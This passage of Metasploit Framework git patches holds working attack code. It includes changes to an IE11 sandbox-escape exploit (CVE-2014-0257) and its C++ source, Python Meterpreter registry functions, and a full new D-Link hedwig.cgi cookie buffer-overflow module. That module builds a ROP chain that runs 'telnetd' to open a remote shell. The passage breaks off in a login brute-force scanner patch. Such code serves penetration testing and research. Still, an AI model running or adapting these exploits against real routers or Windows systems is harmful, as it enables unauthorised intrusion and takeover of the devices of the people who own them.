zyRApyL$C>a4r~Qq0Xx82up4XvJ(s%A0}0pwJp_Cm3<vAMOzi*kfKoz#42%OegB<Mi z#7lv`9%RvAdb>%7ZpA1tSqRYUQ65+ca!5e0Qzg)2Kr?htupBx)c&fm|U?S}Fj!+97 zgDBh$=v|=^`cq&FcpP+s^q}ej9U!xeNL~PN-dKf`&JP9~3>FmV1BO7SCt5mmF&Ga0 z45$R(1EaulFb;ehOavbWQ@~fjbnq=O3p@|zf!Dzzun{Z)=Y!?TF#k0ORKf5On28Dp zfVI%CfsNqjU<>#O=mg&ZyTA(|lSm|Q0DfQ-7zCDrVc?4(3w{aeK^}|+TfqeI5}0g7 z;C%$rz^}ke@H6lr_yt%9-T+U5SHW1!<v6emIz6)KWrJQu&O=WFlcCc~OAT}jjYo%k z!3OAYU<u-<fz8l&g4R4F7>Ga{3`Jlk_%zr9o(09r@q7jbfEPh2SWSr|+6YEK&jaaY zL<4frsZ$rCTt6@xI=zgPA)elf%+NEyPQ+smvNB09oP)sv(#uFOA_jpO(C-D)kue<1 zhMo$BLmva?LthKh3*}(27&=z2aIy3UOQD|tE5L=6NJrOcHS|SbG0K@r?|=0$?0}&P z1{v4{JriWm!$_bN`h#E<3b+TP*CrF#0s9fK2V4x+Aio?GuW&!rBtjn#JplTBpc#4? zD22Wei~t{^LzRb!DIf>K7BCvj0fSJH0W?ED1d5^Sz$EAg!3yMKK@0T9!3=N@m<{d% z^T8z`y-^PVi=m$cOTh%N0<_u@s7HdKU^NT{U@Hn%Q#<qrz(&LefKAYsg3Zta!B*(Y zzz(n&><05e@k%0j5)1;%Kzd~#28KgV1f9@_gUXdy|H~1eH&i_sg#@`^9QZ7l2<`?` zz*As1GL8V#p|1p^(9p497W5P_54;Q(gIB;ZumY?CtH65jU9cIf1DQCi|6tGwLlQ{$ z`ES53=x>64NksA*7zREA>cK}qF)AJjCP04_Oa@nh^{^|zH0b+4db5rKGoc>^=~bNr z^Pp#g-BuX12o%9^0F*!v0ZX8-2Ft;%U=Zx1z$)l#z-H(wuoik2$U>KbjnLPDQs|?> z7U;>;4qXX4p+5mKtK5&)3oVG42t5dfO<)+f4P-$NFbez{G=qg;5_lT4fG>j?;PYTM zI2+8bl&OeMz#w{sr&l_9g-@xBnM;m&S~FAJ+j%occUg9WdvnSI>C$Wjg%!5Z?XY<u z^~**u2n@f^J^jU?Fl!*4g+z;c(CR_j>3~h{Eg}(=LYJlr2cVqELxB2AW}176w}N}2 zGh5u#6$17^<v<r0Rhheh?DVx}q+_}ud5|JV38WlS1*wNLL0TYfkWNSs<z94lJ30ml zf`mY%kT6I%Bm%-hl#nP$5R02S7z+tOI1V&J61Ec$N#b^U>T<H$S_4A^qzTdr>4tdj zKxPOBNrYrViXl~y7DzWFWG5CFBn6TUDTEY3PC?2cjgV$Y8>9;&$w1>EiI8ka8KfzL zOqO&a5U>lCK~f-v5Zcpnum;jXb%><$zzXt#w{JYNoLRywV&WM4g0*DW&{<3*lf*2; zd*`i83bT#b!|b&0Sxb%+#_qL_d~fewN3z7(VeXe1m6_{_o&-_XShP5LasA?>=TnwG zH0!Xwtm@p`A9UIqQi#H5>Xx-TGdAq7yHZGK<(LiRw8wIKO}mEkU4#=a3L9MG4Tkw~ z5MH_uCd@6!On<!4hP(v12^op&(0oWb#3o#gP-DN(STBAAfv&WNZX#m_wGM(8!Q=%~ zvS3mL4R+rFB_K^H14W<~q^oEKNVCv`sRnxvO;c_^y@?F9(jYzW=ov=CTsC|UpKN4- zDtxFtueZp;-Xb6C)t~9*OQ1K>y#o4xwY_Wr>0)aF=}n-emu(;p=t;~k2*7^lbMP7X z4;s)F!U%1q{YXQjj)w-=vr~y!D)o1_PzKUY(F7$(KwDV>p4?0V?A56xL|O|i3f8{Q zxiRh{Jz?nXSLD<}6h#wdgF<IPTI_SZRnRfi<A*C6mtdc<nT*l5B8rX^EW(FI(JYh} zB#i?5K8fSp_0qUgi0kW$L?Ur_fkxE#iwKPBji4><LIf>2z`ihz%!=1Pcz3*LyJ+4x z*rLF`&$`LXKlJg?X<SXOXQv@O&6i>SDvgXBojuJRy%Il~&}1curZtv>U5D+#TS)ML zUwYGY*h9CFp{vLDCf(S}E+nO`@x<Rx*9+O)t@Oie(jxnYir&e5|CN_T9-24mPG0+2 zR4Iy@ZhvPB87;Ca>_0&Fo~~jfb5(ZVtz<L_v=7)y#)za*_IXgb&?I-uzgvmF(1qYH zfP|T;=w+YYw9uU{9F#-sjax{7ckFT;e9LKN!NW%3?c@YV6dKg`Ik3q7!&WjjFbzLY z_IX?u!gL7p?V;Pql(8PD)CWSdtVedrE+nDD$m9ycxOE%)6l-?(DQb<-57FP-glfIT zdl^aCULj6$B<pSmP9RJh88rCM{dcY62kgdll(z3d`-*go(6U^2X+;HY>W>S<BC34Y zU0c`*xBh*xJ$O4AEfJk@w~#ij;VIN$-b#YTUhcK_4OacX2G9Dm&{nUx&*4v|?FY7# zk=~vc@mJ6n1@nZ)3;45K2raa)i0Xe8k^Y*yA!ly58@A~)p+PGPK6mE}dG>$0%X+*= zPR^ra?f&e;?~jZWzZv2O*}hLBZ01n>*xJwbDQx(EG{-{&|Nn2i|8KwXR?0KT`(AvF zC__{;tx~j)T*eD31)N&tc5Hj+R&2Gc4-lob822xFK|BT0yHN>9??$EI7_c0qcd7GW zC|C{BBc~Rm$4>)DPp2l3dQb~U54bjv-l;mkAz&vc1-n4Hmvn=8eq6^e_^T)SP#^~B z4ORk<0E0k!sgr`jB@Uzy11v}%0yuCi7zK_4qrosR7Nn0)ao_|nq4IYt;k{zGHMq(^ zq9D<bSV$bi3`u|_K~f-TkW9!yNIs+(atcxcDYd_rOD38d5p039LCPQ<kS<6M#4{P= z011MGL0E_q!a<@TiI6_`PeC{hV%HxcL8HnMs)jT`S|ME!&$TECBDHTnM5fQkL+})& z48lRqLuw!mkQPWMgjt8179<?PLO4hqBm+`nZ$Cur66y+h8eB8A;A8Yy3-Y21-?Q?? z!{o5Xw5atM9!N(U^M4_g>uhAT=RF6<qI`%2f?>!0dhHk)N%HMK9mD^9&$kaM6fo6| z_(C!q#tqO$<;&bTrkQ3eU9*1MmNgr8?AW#=D#~5T=|VCEDc^JB&q6W|+Nk5S=t}Kz zGQz`puV$I%kfvC3QB$pH(0r)*UGtY_0hhp~aC^Cv-1FQe?JrtYWNhTak@m><BPZ%s z>dxqL^|$py4HFG=gTb)Tu-kCO@UCIJ@sjbn(P^}puA9C!F;XlFG+`JU&+cU3V@Jrw z$TrG$$)1sYF7uGDl0PRuC;vk(R?M_2<|#HPK2fwO#w!;oElQj6jIv(&mGU0d2-R%W z64g_xKUALTGW9oVM&qlA(`?rq&`3Fj)}WoEJ*h3zMn%4-`&+k9A8Lp<R2%9IKNyA^ z=NMNR(~UMX=L@6D7;I9R%%)YQou=1J@0va~{b^!YyzGJ-d9V{%tBjq&&S5vR+u0Y{ z*Vzx)7Pf=!W_@JCWnr=inOtU+nPuB#)8u;jY<YtGlKeM$w_K!9E9NVfDAp)S6c-g= zD*mG|D>o>u%CD6YRjw*u^`z<()#s{jRPCx?RKKfwR32(y^*!n!^%(U8^)$6wZB)-w zFIFe2SF0^n^$zue>W9@&sb5fkrFN=stHqjg8aZd?c5r!I12<p0Q~Q|qIqeeNPF=o^ z*FB~y(Ut1Tbk}sZbb<O1y;L8j57$TNS-n!v=^xbR>GSo4`Xc>*^j-!jrYOR|8kB}5 z2CLyELls7-#!!n<YA`e!nhc|jVMc4XF~Z0iPnu4d>P!u$YbK|Of$ub8?qn>-MzIy_ z1@<!g4o1dX<|i91dr<bCEF9x-MgA#9B2rPS_+F8yT&-NEyid7Bxm~$OdB5_2GFN$2 zS*R>hKB{~|S*k2ko>jiA{6;wtllm5>vPbQq8K{wH0yIHZ%?!<bnp{o3rchG^H$0^& z(UfY+G{0)PH9Z=J^W;*wU0fk&=T31YTq*Y!_X`)Q4cA6!S*=pbY4zGDZM60wZIQNE zdrDiPb?D0U_4*M8nL%wRHC`~*n9vh5o>qZGb_2VcJ;^4?A634pu2+Ako~*IH!zF58 z&{}jS4Cmp+pBly*O~x4Gy~Yj3OyfgFyYY<itnp)`w`sH~&a}|9+hj8xH=TwXwbO!= zu|vX<MzG(pH`yVwJ+fP}@8rCq45RX`B21}OCMY+;FQVYeOI52?DXN{S{i+<*!>Uto z?DMM2s#>e+OE^ilih+AfQOndCIL91yoO+RZg?f#8gL(`6BU7EN&Q;sgyt-KZg!&nH z%1i23)R)z@>IU^S^(X2t)otn@)W524ssC1cVU<WUL7GvTahfR_R-@J!HM2BxH48OM zH7hkKnoXK*nmw8<&4Zewnq!(18tdblr!d?VnhTmsnk$-m&HI|`n$I*}Y1%bEYq~H6 zg!AG2xd1Mh8_P}PrgADSl8fSExp;0dw~|ZdHga3Jo!Bc5aECY>SHwNSJ;^=Gy~thS z-sT#)&$;io_{c8ZDE(}Gf_{bmq~2^;XL!o+qTzKo;6>vfRwFU_nC>%eF%n_e+p zro)<!4G_4+-e!-=7s0J^l#eJ+E4wr;-1poqZj$y<ZMpWccAM@OT?mRz(m$<#UH_Z@ zPyJYINJ|WB4e5pxhEELPM!7M;xXqYne8l)7eBrXO&e(4J)!1#kZ45C@GRaKwChKz3 z8dIt%({unc`<SW3^t9=s>5{M#zA$}b>M}9eIEK-fDXfB>%`Rk@vK!eQ>>l<(HlKZp zy~3`S?UNmr@v<|r=VY(SZpeO-{V8+FeC1Q+a=B4HOTJEiTwW}H2K(LD@>}x1<toJt z#R2RaA1gW)Dy7b<oT;=cKfu<ZP_2h+Jg0g^^}ecE^@XZU^@C~wwux`B7A9fX_j0-1 zajbzCxNBSo*UkB8CE8KiIBkM<gZ2^a>)MaBUub{U{-zxqIW$rhxggRO`CX)5_lIth z{&W2}gVwME1OAiYHb!N-QEfCBml#uwTaDKHjk(4X*th96iEb9+{T=W$Tg`T{1F#E9 zW%Fep%KnlC%16n=<tF)Zd4@boepG%;{)D^%J({LSQS4FpD0SEYUQ~XebSi&Vid2JD z(^Rq8zEf0NRoSXzs*|c`RToq>s(RJOaCk55fwSP`>FUR=>bKy-E$Cq~w-3D=r?qQ` zM=pt69hnvRbL1u654zuUbM=e#(+!c>;ny0*VY}i?GfYegp5xHashEmvwu}|Yv@%w{ zRK8Z8Bfl;W!1laWaaci=MrABErdO1|D~G6Lsvof(OVk(CSJa=Xzf}il_G+wjA(X=N zn>AnK<n!W&a3LHE&tA)2<=%z={>Axg1GR~!bEaQSOa<O@qSA8N7WpjIT-Cj*bE;R- ztM642YB`qfM)fgl<S(mlst0I>YNliH={55-X3Yl8ZY;PX*y3KmI{QZRhb9Kw+Ou4^ zHqxs7CbB*9_s9rcw60KhQuh>g_D^)*=$yKrbieBU(k;+0)<3Mb>r3F{XY~$!jeZn% z^_hk^!zIHeW1}(C)Iq1MM%d(-7ua%HH8$vvW#7vFkOj-9$(P7W<n@YHg+#enbCSC! za(JX6a#rMq$jy;M^e-DP8m+HlS-feyYJA7|zVV#tRnyz<ovjhShM?SFc0GHRZIKO; zyW}GjQxpcpy%^Y?id=<V@toq4;ys*xH&OUlrBXRtnWzlZs&O=@Xt!&3YY%FxwV{zy zBcG0ZJ+eOXhe&UoS(l{C(LJIo*S)X%SQn~S>GxW3W)<j9=`ZQu$E9K<{B(gK(U5N} z!<Ngm;sp#E@iY6dj8P0!4OIoH^s4!ADJzcI<Eqnes*9@ERPU)iQr%E}g=zQ+^ZS>I zs0XNrs7I(n)sxkFbpm$M_3BOPo$3eFZ>VozpVVk>X@a$(+QT?AtmWF5wUyc{+Q`Tx zU5d`n@Py%c180mf#u--{zsE+QGL@T{PTYvmkoVc^>;rO%B1G}L;$_8U^nSTAUHQCH zu6h_pQ_%l7j`jK|eKed`Vwhy$49gA24L=*`s|$KlpUlnFHyJ*)7<`Nt<1kZ#X@}`O z{6!}Iz!i}m>{NCYwwTA+m)VQ#o9tEgLsZ>@W2Te+59=wT4}xVlcr3CsS-LDkmMP1U zWy=oA3S~vIV%aHKnXFt^Ars5}<Pv!pmTiQbwVR$Gv+Vdku1oDLPY|R1iDw9BU-TqN zq1SvCf6NQy$?|&(D3O)QT4b%VHknh_A?wh0>Fq5~l6ulq`E&{KA|7I;r1Hhn<Sjy< zQp`knj14zMm{^n2#3bV{cVVtoG$`zaXUJr+)7W9`G<F&7m(P%+B*;Fulo)(cv=(h? zWSRX$DS6HsWa3QGrW8|}DZ`XyI%q1yVNh+VH8q)9Ol@%SE>jP6^K8O&1D>oO8^DIJ zVQd7eXQNp&o6csk2eBj9u#Fg|9t@G6EC72~xGYwdf&t2wm0(C3WX<SPn4FWx$`j?u za*I4&o+;0l7g^<}<fZa5d4;?dn_8>fDeuJPrbo^w#F*?bMTA1B;1qgAv?5WFsVGtu zE2<RDif#p?^i)cf;mQbQH1?Sk++Q=5r*Pe=P_`&ru@!bIyOljkPxvjTN>pX2GF8Q@ zQfwFvDyK@U4p+yjE$TenZl(3=CUvJ;qKUwf9futwO_Pq@qC(TC>BL3IkE^siLy8HW HNhAIbcuhyq diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index 6b1193acfe..2e515e13fc 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer include Msf::Post::Windows::Priv + include Msf::Post::File def initialize(info={}) super( update_info( info, @@ -68,6 +69,10 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Failure::NotVulnerable, "Not running at Low Integrity") end + unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") + fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found") + end + begin Timeout.timeout(datastore['DELAY']) { super } rescue Timeout::Error @@ -78,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Local exploit_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta" session.railgun.kernel32.SetEnvironmentVariableA("MYURL", exploit_uri) - temp = session.sys.config.getenv('TEMP') + temp = get_env('TEMP') print_status("Loading Exploit Library...") @@ -101,7 +106,6 @@ var shell = new ActiveXObject("WScript.Shell"); shell.Run(command); </script> eos - print_status(hta) send_response(cli, hta, {'Content-Type'=>'application/hta'}) else send_not_found(cli) From c1368dbb4c37262fa69b5b0254c0c2c54d14e8fd Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 09:06:41 -0500 Subject: [PATCH 424/853] Use %windir% --- .../IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp index aa7ce2ffac..69dc7c57bb 100755 --- a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp @@ -90,11 +90,11 @@ template<typename T> T ExecuteMethod(mscorlib::_MethodInfoPtr method, std::vecto return retObj; } -bstr_t GetExploitUrl() +bstr_t GetEnv(LPWSTR env) { WCHAR buf[MAX_ENV]; - GetEnvironmentVariable(L"MYURL", buf, MAX_ENV); + GetEnvironmentVariable(env, buf, MAX_ENV); return buf; } @@ -119,7 +119,7 @@ void DoDfsvcExploit() PROCESS_INFORMATION procInfo = { 0 }; // Start dfsvc (because we can due to the ElevationPolicy) - if (CreateProcess(L"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline, + if (CreateProcess(GetEnv(L"windir") + L"\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline, nullptr, nullptr, FALSE, 0, nullptr, nullptr, &startInfo, &procInfo)) { CloseHandle(procInfo.hProcess); @@ -166,7 +166,7 @@ void DoDfsvcExploit() std::vector<variant_t> startArgs; startArgs.push_back(L"mshta"); - startArgs.push_back(GetExploitUrl()); + startArgs.push_back(GetEnv(L"MYURL")); ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs); } From e2cc2fece00e0294465346ea2e0693636bb76974 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Fri, 30 May 2014 10:51:36 -0400 Subject: [PATCH 425/853] Pymeterpreter update win reg functions for python v3 --- data/meterpreter/ext_server_stdapi.py | 37 ++++++++++++++++++--------- 1 file changed, 25 insertions(+), 12 deletions(-) diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index 41b07b142c..3155e788da 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py @@ -48,6 +48,12 @@ try: except ImportError: has_winreg = False +try: + import winreg + has_winreg = True +except ImportError: + has_winreg = (has_winreg or False) + if sys.version_info[0] < 3: is_str = lambda obj: issubclass(obj.__class__, str) is_bytes = lambda obj: issubclass(obj.__class__, str) @@ -1271,9 +1277,10 @@ def stdapi_registry_close_key(request, response): def stdapi_registry_create_key(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] + base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS) res_key = ctypes.c_void_p() - if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS: + if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_HKEY, res_key.value) return ERROR_SUCCESS, response return ERROR_FAILURE, response @@ -1282,18 +1289,20 @@ def stdapi_registry_create_key(request, response): def stdapi_registry_delete_key(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] + base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value'] if (flags & DELETE_KEY_FLAG_RECURSIVE): - result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key) + result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, ctypes.byref(base_key)) else: - result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key) + result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, ctypes.byref(base_key)) return result, response @meterpreter.register_function_windll def stdapi_registry_delete_value(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] - result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name) + value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) + result = ctypes.windll.advapi32.RegDeleteValueA(root_key, ctypes.byref(value_name)) return result, response @meterpreter.register_function_windll @@ -1362,9 +1371,10 @@ def stdapi_registry_load_key(request, response): def stdapi_registry_open_key(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] + base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS) handle_id = ctypes.c_void_p() - if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS: + if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_HKEY, handle_id.value) return ERROR_SUCCESS, response return ERROR_FAILURE, response @@ -1394,24 +1404,26 @@ def stdapi_registry_query_class(request, response): @meterpreter.register_function_windll def stdapi_registry_query_value(request, response): - REG_SZ = 1 - REG_DWORD = 4 hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] + value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) value_type = ctypes.c_uint32() value_type.value = 0 value_data = (ctypes.c_ubyte * 4096)() value_data_sz = ctypes.c_uint32() value_data_sz.value = ctypes.sizeof(value_data) - result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz)) + result = ctypes.windll.advapi32.RegQueryValueExA(hkey, ctypes.byref(value_name), 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz)) if result == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value) - if value_type.value == REG_SZ: + if value_type.value == winreg.REG_SZ: response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE) - elif value_type.value == REG_DWORD: + elif value_type.value == winreg.REG_DWORD: value = value_data[:4] value.reverse() - value = ''.join(map(chr, value)) + if sys.version_info[0] < 3: + value = ''.join(map(chr, value)) + else: + value = bytes(value) response += tlv_pack(TLV_TYPE_VALUE_DATA, value) else: response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value)) @@ -1422,9 +1434,10 @@ def stdapi_registry_query_value(request, response): def stdapi_registry_set_value(request, response): hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] + value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value'] value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value'] - result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data)) + result = ctypes.windll.advapi32.RegSetValueExA(hkey, ctypes.byref(value_name), 0, value_type, value_data, len(value_data)) return result, response @meterpreter.register_function_windll From 1ddc2d4e870d214052ebd0fcb3c3ca8ebc74697e Mon Sep 17 00:00:00 2001 From: Michael Messner <devnull@s3cur1ty.de> Date: Fri, 30 May 2014 17:32:49 +0200 Subject: [PATCH 426/853] hedwig.cgi - cookie bof - return to system --- .../linux/http/dlink_hedwigcgi_rop_system.rb | 124 ++++++++++++++++++ 1 file changed, 124 insertions(+) create mode 100644 modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb diff --git a/modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb b/modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb new file mode 100644 index 0000000000..960d5ad095 --- /dev/null +++ b/modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb @@ -0,0 +1,124 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ManualRanking # the exploit as it is is excellent but we can only start the telnetd and connect to it + + HttpFingerprint = { :pattern => [ /Linux,\ HTTP\/1.0,\ DIR-/ ] } + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link hedwig.cgi Buffer Overflow in Cookie Header', + 'Description' => %q{ + This module exploits an anonymous remote code execution vulnerability on different D-Link routers. + This module has been tested successfully on D-Link DIR300-v2.14, DIR600 and DIR645A1_FW103B11. + Different other devices like the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable + and they were tested within an emulated environment. They are a little bit different in the first ROP gadget. + }, + 'Author' => + [ + 'Roberto Paleari', # Vulnerability discovery + 'Craig Heffner', # also discovered the vulnerability / help with some parts of this exploit + 'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module and verification on different other routers + ], + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { 'PAYLOAD' => 'generic/shell_bind_tcp' }, + 'References' => + [ + [ 'OSVDB', '95950' ], + [ 'EDB', '27283' ], + [ 'URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008' ], #advisory on vendor web site + [ 'URL', 'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000' ], #vendor web site of router + [ 'URL', 'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt' ] #original advisory + ], + 'Targets' => + [ + [ 'D-Link DIR-645 v1.03 - start telnetd', + { + 'Offset' => 973, + 'LibcBase' => 0x2aaf8000, #Router + #'LibcBase' => 0x40854000, # QEMU environment + 'System' => 0x000531FF, # address of system + 'CalcSystem' => 0x000158C8, # calculate the correct address of system + 'CallSystem' => 0x000159CC, # call our system + } + ] + ], + 'DisclosureDate' => 'Feb 08 2013', + 'DefaultTarget' => 0)) + end + + def check + begin + res = send_request_cgi({ + 'uri' => "/hedwig.cgi", + 'method' => 'GET' + }) + + if res && [200, 301, 302].include?(res.code) + return Exploit::CheckCode::Detected + end + rescue ::Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + + Exploit::CheckCode::Unknown + end + + def exploit + lport = datastore['LPORT'] + cmd = "/usr/sbin/telnetd -p #{lport}" + + print_status("#{peer} - Trying to access the vulnerable URL...") + + unless check == Exploit::CheckCode::Detected + fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") + end + + # prepare our shellcode that triggers the crash: + shellcode = rand_text_alpha_upper(target['Offset']) # padding + shellcode << [target['LibcBase'] + target['System']].pack("V") # s0 - address of system + shellcode << rand_text_alpha_upper(16) # unused reg $s1 - $s4 + shellcode << [target['LibcBase'] + target['CallSystem']].pack("V") # s5 - second gadget (call system) + + # .text:000159CC 10 00 B5 27 addiu $s5, $sp, 0x170+var_160 # get the address of our command into $s5 + # .text:000159D0 21 28 60 02 move $a1, $s3 # not used + # .text:000159D4 21 30 20 02 move $a2, $s1 # not used + # .text:000159D8 21 C8 00 02 move $t9, $s0 # $s0 - system + # .text:000159DC 09 F8 20 03 jalr $t9 # call system + # .text:000159E0 21 20 A0 02 move $a0, $s5 # our cmd -> into a0 as parameter for system + + shellcode << rand_text_alpha_upper(12) # unused registers $s6 - $fp + shellcode << [target['LibcBase'] + target['CalcSystem']].pack("V") # $ra - gadget nr 1 (prepare the parameter for system) + + # .text:000158C8 21 C8 A0 02 move $t9, $s5 # s5 - our second gadget + # .text:000158CC 09 F8 20 03 jalr $t9 # jump the second gadget + # .text:000158D0 01 00 10 26 addiu $s0, 1 # s0 our system address - lets calculate the right address + + shellcode << rand_text_alpha_upper(16) # filler in front of our command + shellcode << cmd + + # now lets rock it ... + + print_status("#{peer} - Sending exploit ...") + + res = send_request_cgi({ + 'method' => 'POST', + #'uri' => "/hedwig_gdb.cgi", #for debugging on the router + 'uri' => "/hedwig.cgi", + 'cookie' => "uid=#{shellcode}", + 'encode_params' => false, + 'vars_post' => { + 'test' => 'test', + } + }) + end +end From 76ed9bcf865f486cd7de8bfc2d43ada1f3d825c4 Mon Sep 17 00:00:00 2001 From: Michael Messner <devnull@s3cur1ty.de> Date: Fri, 30 May 2014 17:49:37 +0200 Subject: [PATCH 427/853] hedwig.cgi - cookie bof - return to system --- modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb b/modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb index 960d5ad095..6106377547 100644 --- a/modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb +++ b/modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb @@ -18,8 +18,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits an anonymous remote code execution vulnerability on different D-Link routers. This module has been tested successfully on D-Link DIR300-v2.14, DIR600 and DIR645A1_FW103B11. - Different other devices like the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable - and they were tested within an emulated environment. They are a little bit different in the first ROP gadget. }, 'Author' => [ From 40a103967e9e7ed43cd4030c05d73c768252966f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 11:28:37 -0500 Subject: [PATCH 428/853] Minor code cleanup --- .../scanner/http/etherpadduo_login.rb | 163 +++++++++--------- 1 file changed, 83 insertions(+), 80 deletions(-) diff --git a/modules/auxiliary/scanner/http/etherpadduo_login.rb b/modules/auxiliary/scanner/http/etherpadduo_login.rb index 42d9bcc6cb..ae1096c3b7 100644 --- a/modules/auxiliary/scanner/http/etherpadduo_login.rb +++ b/modules/auxiliary/scanner/http/etherpadduo_login.rb @@ -6,97 +6,100 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner -include Msf::Exploit::Remote::HttpClient -include Msf::Auxiliary::Report -include Msf::Auxiliary::AuthBrute -include Msf::Auxiliary::Scanner - -def initialize(info={}) - super(update_info(info, - 'Name' => 'EtherPAD Duo Login Brute Force Utility', - 'Description' => %{ - This module scans for EtherPAD Duo login portal, and - performs a login brute force attack to identify valid credentials. + def initialize(info={}) + super(update_info(info, + 'Name' => 'EtherPAD Duo Login Brute Force Utility', + 'Description' 